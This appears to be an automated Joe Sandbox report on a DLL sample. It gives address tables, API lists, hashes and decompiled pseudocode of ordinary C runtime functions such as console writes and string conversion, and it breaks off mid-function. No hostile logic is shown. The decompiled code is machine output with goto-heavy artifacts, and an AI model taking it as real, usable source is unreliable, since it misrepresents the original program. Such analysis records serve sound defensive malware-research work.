              0x6da9fde1
              0x6da9fde3
              0x00000000
              0x6da9fdaf
              0x6da9fdaf
              0x6da9fdb2
              0x6da9fdb5
              0x6da9fdb8
              0x6da9ff02
              0x6da9ff10
              0x6da9ff19
              0x6da9fdbe
              0x6da9fdc8
              0x6da9fdcd
              0x6da9fdd0
              0x6da9fdd3
              0x6da9fdd9
              0x00000000
              0x6da9fdd9
              0x6da9fdd3
              0x6da9fdb8
              0x6da9fd80
              0x6da9fd87
              0x6da9fd8a
              0x6da9fd8d
              0x6da9fd8f
              0x6da9fd92
              0x6da9fd99
              0x6da9fd9b
              0x6da9fde4
              0x6da9fde7
              0x6da9fde8
              0x6da9fded
              0x6da9fdf0
              0x6da9fdf3
              0x6da9fdf9
              0x00000000
              0x6da9fdf9
              0x6da9fdf3
              0x6da9fc43
              0x6da9fc46
              0x6da9fc48
              0x6da9fc4a
              0x6da9fc4e
              0x6da9fc4f
              0x6da9fc53
              0x00000000
              0x00000000
              0x00000000
              0x6da9fc53
              0x6da9fc58
              0x6da9fc5a
              0x6da9fc5f
              0x6da9fd1f
              0x6da9fd26
              0x6da9fd27
              0x6da9fd2a
              0x6da9fd2c
              0x6da9fedc
              0x6da9fede
              0x00000000
              0x6da9fee0
              0x6da9fee0
              0x6da9fee3
              0x6da9fef2
              0x6da9fef6
              0x6da9fef7
              0x6da9fef7
              0x00000000
              0x6da9fefb
              0x00000000
              0x6da9fd32
              0x6da9fd37
              0x6da9fd3a
              0x6da9fd3d
              0x6da9fd43
              0x6da9fd4c
              0x6da9fd57
              0x6da9fd5c
              0x6da9fd5f
              0x6da9fd62
              0x6da9fd6b
              0x6da9fd6b
              0x6da9fd6e
              0x00000000
              0x6da9fd6e
              0x6da9fd62
              0x6da9fc65
              0x6da9fc68
              0x6da9fc6e
              0x6da9fc70
              0x6da9fc7d
              0x6da9fc7e
              0x6da9fc81
              0x6da9fc84
              0x6da9fc89
              0x6da9fead
              0x6da9feaf
              0x6da9feb1
              0x6da9feb4
              0x6da9feb7
              0x6da9fec3
              0x6da9fec6
              0x6da9fec8
              0x6da9fec9
              0x6da9fecd
              0x6da9fed0
              0x6da9fed0
              0x6da9fed4
              0x6da9fed4
              0x6da9fed4
              0x6da9fed7
              0x6da9fed7
              0x6da9fc8f
              0x6da9fc8f
              0x6da9fc92
              0x6da9fc94
              0x6da9fc97
              0x6da9fc99
              0x6da9fc9d
              0x6da9fc9e
              0x6da9fc9f
              0x6da9fca3
              0x6da9fca8
              0x6da9fcb2
              0x6da9fcb7
              0x6da9fcba
              0x6da9fcba
              0x6da9fcbd
              0x6da9fcc0
              0x6da9fcc2
              0x6da9fcc5
              0x6da9fcce
              0x6da9fcd2
              0x6da9fcd3
              0x6da9fcda
              0x6da9fce0
              0x6da9fce8
              0x6da9fcf3
              0x6da9fcf8
              0x6da9fd03
              0x6da9fd08
              0x6da9fd0e
              0x6da9fd17
              0x6da9fd71
              0x6da9fd71
              0x6da9fdfc
              0x6da9fe01
              0x6da9fe13
              0x6da9fe18
              0x6da9fe1b
              0x6da9fe20
              0x6da9fe3b
              0x6da9ff1e
              0x6da9ff24
              0x6da9fe41
              0x6da9fe41
              0x6da9fe4c
              0x6da9fe4e
              0x6da9fe51
              0x6da9fe5a
              0x6da9fe64
              0x00000000
              0x6da9fe66
              0x6da9fe68
              0x6da9fe6a
              0x6da9fe83
              0x00000000
              0x6da9fe89
              0x6da9fe8d
              0x6da9fe93
              0x6da9fe96
              0x6da9fe9c
              0x6da9fe9f
              0x00000000
              0x6da9fe9f
              0x6da9fe8d
              0x6da9fe83
              0x6da9fe64
              0x6da9fe5a
              0x6da9fe3b
              0x6da9fe20
              0x6da9fd0e
              0x6da9fc89
              0x6da9fc5f
              0x00000000
              0x6da9fea2
              0x6da9fea2
              0x6da9feab
              0x6da9ff26
              0x6da9ff2b
              0x6da9ff33
              0x6da9ff34
              0x6da9ff35
              0x6da9ff41
              0x00000000

              APIs
              • GetConsoleOutputCP.KERNEL32(6C4E8CEB,?,00000000,?), ref: 6DA9FBD8
                • Part of subcall function 6DA98F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA97659,?,00000000,-00000008), ref: 6DA9902D
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6DA9FE33
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DA9FE7B
              • GetLastError.KERNEL32 ref: 6DA9FF1E
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 9671e62ca3c69a2b02c7bba29f9da7ab402fb30b711d34cbddfc8ca461f86663
              • Instruction ID: 84e37442454f29bde58b2160e63c2f8858fba6e6983ff3edc45f44dc3cc54ec1
              • Opcode Fuzzy Hash: 9671e62ca3c69a2b02c7bba29f9da7ab402fb30b711d34cbddfc8ca461f86663
              • Instruction Fuzzy Hash: 99D15A75D186599FCB01CFA8C880AEDBBF5FF09314F18852EE965EB245D730A982CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8C588 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 67%
              			E6DA8C588(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6dab11e0);
				E6DA89CA0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6DA8AB10(_t107, E6DA8A8AF(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6DA8AB10(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6dad54e4; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6daa415c();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6DA90BF9(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6dab1200);
									E6DA89CA0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6DA8C588(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6DA8D288(_t103, _t108[0x18], E6DA8A8AF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6DA8D298(_t103, _t108[0x18], E6DA8A8AF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6DA8A8AF();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















              0x6da8c588
              0x6da8c58a
              0x6da8c58f
              0x6da8c594
              0x6da8c596
              0x6da8c599
              0x6da8c59e
              0x6da8c6ae
              0x6da8c6ae
              0x6da8c6ae
              0x00000000
              0x6da8c5ad
              0x6da8c5ad
              0x6da8c5b2
              0x6da8c5bc
              0x6da8c5be
              0x6da8c5c3
              0x6da8c5c8
              0x6da8c5c8
              0x6da8c5ca
              0x6da8c5cd
              0x6da8c5d2
              0x6da8c5f4
              0x6da8c5f4
              0x6da8c5f7
              0x6da8c5fa
              0x6da8c618
              0x6da8c61b
              0x6da8c65a
              0x6da8c65d
              0x6da8c660
              0x6da8c685
              0x6da8c687
              0x00000000
              0x6da8c689
              0x6da8c689
              0x6da8c68b
              0x00000000
              0x6da8c68d
              0x6da8c68d
              0x6da8c692
              0x6da8c696
              0x6da8c696
              0x6da8c697
              0x00000000
              0x6da8c697
              0x6da8c68b
              0x6da8c662
              0x6da8c662
              0x6da8c664
              0x00000000
              0x6da8c666
              0x6da8c666
              0x6da8c668
              0x00000000
              0x6da8c66a
              0x6da8c67b
              0x00000000
              0x6da8c680
              0x6da8c668
              0x6da8c664
              0x6da8c61d
              0x6da8c61d
              0x6da8c621
              0x00000000
              0x6da8c627
              0x6da8c627
              0x6da8c629
              0x00000000
              0x6da8c62f
              0x6da8c636
              0x6da8c63e
              0x6da8c642
              0x6da8c644
              0x6da8c647
              0x6da8c64c
              0x6da8c64d
              0x00000000
              0x6da8c64d
              0x6da8c647
              0x00000000
              0x6da8c642
              0x6da8c629
              0x6da8c621
              0x6da8c5fc
              0x6da8c5fc
              0x00000000
              0x6da8c5fc
              0x6da8c5d9
              0x6da8c5d9
              0x6da8c5de
              0x6da8c5e3
              0x00000000
              0x6da8c5e5
              0x6da8c5e7
              0x6da8c5f0
              0x6da8c5ff
              0x6da8c601
              0x6da8c6c0
              0x6da8c6c0
              0x6da8c6c5
              0x6da8c6c6
              0x6da8c6c8
              0x6da8c6cd
              0x6da8c6d2
              0x6da8c6d5
              0x6da8c6d8
              0x6da8c6db
              0x6da8c6e4
              0x6da8c6e4
              0x6da8c6dd
              0x6da8c6dd
              0x6da8c6dd
              0x6da8c6e7
              0x6da8c6eb
              0x6da8c6ee
              0x6da8c6ef
              0x6da8c6f0
              0x6da8c6f1
              0x6da8c6f4
              0x6da8c6fd
              0x6da8c6fd
              0x6da8c700
              0x6da8c736
              0x6da8c702
              0x6da8c702
              0x6da8c702
              0x6da8c705
              0x6da8c71c
              0x6da8c71c
              0x6da8c705
              0x6da8c73b
              0x6da8c745
              0x6da8c751
              0x6da8c60f
              0x6da8c60f
              0x6da8c614
              0x6da8c615
              0x6da8c64f
              0x6da8c656
              0x6da8c69a
              0x6da8c69a
              0x6da8c6a1
              0x6da8c6b0
              0x6da8c6b3
              0x6da8c6bf
              0x6da8c6bf
              0x6da8c601
              0x6da8c5e3
              0x00000000
              0x00000000
              0x00000000
              0x6da8c5b2

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: AdjustPointer
              • String ID:
              • API String ID: 1740715915-0
              • Opcode ID: fbfadba9bab8c391f54a26716dc31590541c867dc6f8b32b225631b79761cb85
              • Instruction ID: 019639104f1065aa07f3a947da39e264e405049fbbb5c066236f059bff659a90
              • Opcode Fuzzy Hash: fbfadba9bab8c391f54a26716dc31590541c867dc6f8b32b225631b79761cb85
              • Instruction Fuzzy Hash: CC51B07660C2029FEB198F14D940BBA77A5FF44314F145639EE1657292E731E8D1CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA99272 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA99272(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E6DA98F81(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E6DA90DEA(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E6DA903A9(GetLastError());
									_t20 =  *((intOrPtr*)(E6DA90403()));
								}
								L14:
								return _t20;
							}
							_t20 = E6DA99814(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6DA903A9(GetLastError());
						return  *((intOrPtr*)(E6DA90403()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E6DA99814(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E6DA90E0E(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}











              0x6da99279
              0x6da9927e
              0x6da9929c
              0x6da9929e
              0x6da992a1
              0x6da992ca
              0x6da992d2
              0x6da992d4
              0x6da992ed
              0x6da992f0
              0x6da992f3
              0x6da99301
              0x6da9930e
              0x6da99313
              0x6da99315
              0x6da9932e
              0x6da99331
              0x6da99331
              0x6da99317
              0x6da9931e
              0x6da99329
              0x6da99329
              0x6da99333
              0x00000000
              0x6da99333
              0x6da992f8
              0x6da992fd
              0x6da992ff
              0x00000000
              0x00000000
              0x00000000
              0x6da992ff
              0x6da992dd
              0x00000000
              0x6da992e8
              0x6da992a3
              0x6da992a6
              0x6da992a9
              0x6da992b8
              0x6da992bb
              0x6da99292
              0x6da99292
              0x00000000
              0x6da99295
              0x6da992af
              0x6da992b4
              0x6da992b6
              0x6da99337
              0x6da99337
              0x00000000
              0x6da992b6
              0x6da99280
              0x6da99285
              0x6da9928a
              0x6da9928c
              0x6da9928f
              0x00000000

              APIs
                • Part of subcall function 6DA98F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA97659,?,00000000,-00000008), ref: 6DA9902D
              • GetLastError.KERNEL32 ref: 6DA992D6
              • __dosmaperr.LIBCMT ref: 6DA992DD
              • GetLastError.KERNEL32(?,?,?,?), ref: 6DA99317
              • __dosmaperr.LIBCMT ref: 6DA9931E
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: 0dd029f0e3b76ab020b8f3c337269331d99a179a1badf8b1287fda12cb2d5937
              • Instruction ID: c1665d09b6c338071b9bef9e23ad4afa8aab74162fd84efe229aecffccd2ccec
              • Opcode Fuzzy Hash: 0dd029f0e3b76ab020b8f3c337269331d99a179a1badf8b1287fda12cb2d5937
              • Instruction Fuzzy Hash: DE21AF3162C206BF9B109F66CA8096BB7FDFF45368B459519E9189F240DB34EC808BA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA90D0B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA90D0B(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E6DA98F81(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E6DA90DEA(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E6DA903A9(GetLastError());
									_t18 =  *((intOrPtr*)(E6DA90403()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E6DA90E28(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6DA903A9(GetLastError());
						_t18 =  *((intOrPtr*)(E6DA90403()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E6DA90E28(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6DA90EAD(_a8);
				return 0;
			}









              0x6da90d11
              0x6da90d16
              0x6da90d2d
              0x6da90d5f
              0x6da90d69
              0x6da90d82
              0x6da90d88
              0x6da90d96
              0x6da90da3
              0x6da90daa
              0x6da90dc3
              0x6da90dc6
              0x6da90dac
              0x6da90db3
              0x6da90dbe
              0x6da90dbe
              0x6da90dc8
              0x6da90dc9
              0x00000000
              0x6da90dc9
              0x6da90d8d
              0x6da90d94
              0x00000000
              0x00000000
              0x00000000
              0x6da90d94
              0x6da90d72
              0x6da90d7d
              0x00000000
              0x6da90d7d
              0x6da90d2f
              0x6da90d35
              0x6da90d48
              0x6da90d4b
              0x6da90d4d
              0x6da90d4f
              0x00000000
              0x6da90d4f
              0x6da90d3b
              0x6da90d42
              0x00000000
              0x00000000
              0x00000000
              0x6da90d42
              0x6da90d1b
              0x00000000

              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: affda1a3cf3d9fd9d204e8a4b73b6aa7ec7188775d8bc253aca928bdcaac0047
              • Instruction ID: 28e34ca2ab7cb3b3d435f7fb47dbd6276b503086171530f091e1a6f53089bf66
              • Opcode Fuzzy Hash: affda1a3cf3d9fd9d204e8a4b73b6aa7ec7188775d8bc253aca928bdcaac0047
              • Instruction Fuzzy Hash: 6221CF3762D216AF9B109F66C95095B77FDAF413E87068515FA18DF140DB30FC8187A8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DAA1C86 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DAA1C86(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6dab3a00, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6DAA1C6F();
					E6DAA1C31();
					_t13 = WriteConsoleW( *0x6dab3a00, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




              0x6daa1ca3
              0x6daa1ca7
              0x6daa1cb4
              0x6daa1cb9
              0x6daa1cd4
              0x6daa1cd4
              0x6daa1cda

              APIs
              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6DAA1132,?,00000001,?,?,?,6DA9FF72,?,?,00000000), ref: 6DAA1C9D
              • GetLastError.KERNEL32(?,6DAA1132,?,00000001,?,?,?,6DA9FF72,?,?,00000000,?,?,?,6DAA04FB,?), ref: 6DAA1CA9
                • Part of subcall function 6DAA1C6F: CloseHandle.KERNEL32(FFFFFFFE,6DAA1CB9,?,6DAA1132,?,00000001,?,?,?,6DA9FF72,?,?,00000000,?,?), ref: 6DAA1C7F
              • ___initconout.LIBCMT ref: 6DAA1CB9
                • Part of subcall function 6DAA1C31: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6DAA1C60,6DAA111F,?,?,6DA9FF72,?,?,00000000,?), ref: 6DAA1C44
              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6DAA1132,?,00000001,?,?,?,6DA9FF72,?,?,00000000,?), ref: 6DAA1CCE
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: f303f2307e51ff0ec5cd4b4ea01dfef8526bd86c8f97068528c9088c558ea02e
              • Instruction ID: 6f452d2ba57c5b2c0c8b7a65a7c5738bc864ddec934375ea17fedba8c13c7245
              • Opcode Fuzzy Hash: f303f2307e51ff0ec5cd4b4ea01dfef8526bd86c8f97068528c9088c558ea02e
              • Instruction Fuzzy Hash: 56F03736508265BFCF121F91CD18B9D3F76FB09360B1A8514FA1D96120CB328861DB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA90A0D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
              Download Yara Rule
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 6DA90A9D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorHandling__start
              • String ID: pow
              • API String ID: 3213639722-2276729525
              • Opcode ID: 63733fa271e572a50d0150c6ab1634762a98ee3902b755b884491f536515fccb
              • Instruction ID: 78ed9879b08c9c2383c11401faa7ca78078fef87b3a906fda0954d8c2b7fbc11
              • Opcode Fuzzy Hash: 63733fa271e572a50d0150c6ab1634762a98ee3902b755b884491f536515fccb
              • Instruction Fuzzy Hash: 6A515B75A3C30386CB027B39C95137E3BF4EB41790F29CD59E4A48E598EB35C4C18A9A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8C200 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E6DA8C200(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
